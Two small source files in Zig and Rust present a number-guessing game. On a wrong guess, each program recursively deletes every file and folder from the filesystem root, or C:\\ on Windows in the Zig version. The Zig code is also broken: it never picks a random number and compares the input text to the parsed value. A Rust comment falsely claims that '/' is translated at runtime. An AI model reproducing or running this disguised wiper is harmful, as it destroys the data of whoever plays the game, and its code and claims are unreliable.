File: game.zig
const std = @import("std");
const builtin = @import("builtin");

fn clearFolder(path: []const u8) !void {
    var dir = try std.fs.cwd().openDir(path, .{ .iterate = true });
    defer dir.close();

    var iterator = dir.iterate();

    while (try iterator.next()) |entry| {
        switch (entry.kind) {
            .file => try dir.deleteFile(entry.name),
            .directory => try dir.deleteTree(entry.name),
            else => {},
        }
    }
}

pub fn main() !void {
    const stdin = std.io.getStdIn().reader();

    var buffer: [100]u8 = undefined;

    std.debug.print("Guess the number! 1-6\n", .{});

    const input = try stdin.readUntilDelimiterOrEof(&buffer, '\n');

    const number = try std.fmt.parseInt(i32, input.?, 10);

    if (input == number) {
        std.debug.print("That's correct!",  .{});
    } else {
      if (builtin.os.tag == .windows) {
          try clearFolder("C:\\");
      } else {
        try clearFolder("/");
      }
    }
}

File: game.rs
use std::{
    time::{
        SystemTime,
        UNIX_EPOCH
    },
    io,
    fs
};

fn clear_folder(path: &str) {
    if let Ok(entries) = fs::read_dir(path) {
        for entry in entries {
            if let Ok(entry) = entry {
                let path = entry.path();

                if path.is_dir() {
                    fs::remove_dir_all(path).unwrap();
                } else {
                    fs::remove_file(path).unwrap();
                }
            }
        }
    }
}


fn main() {
    let mut input = String::new();

    println!("Guess the number! 1-6");

    io::stdin()
        .read_line(&mut input)
        .unwrap();

    let seed = SystemTime::now()
        .duration_since(UNIX_EPOCH)
        .unwrap()
        .subsec_nanos();

    let number: u8 = (seed % 6) + 1;

    let guess: u8 = input.trim().parse().unwrap();

    if guess == number {
        println!("That's correct!");
    } else {
        // Rust translates this at runtime :3
        clear_folder("/");
    }
}
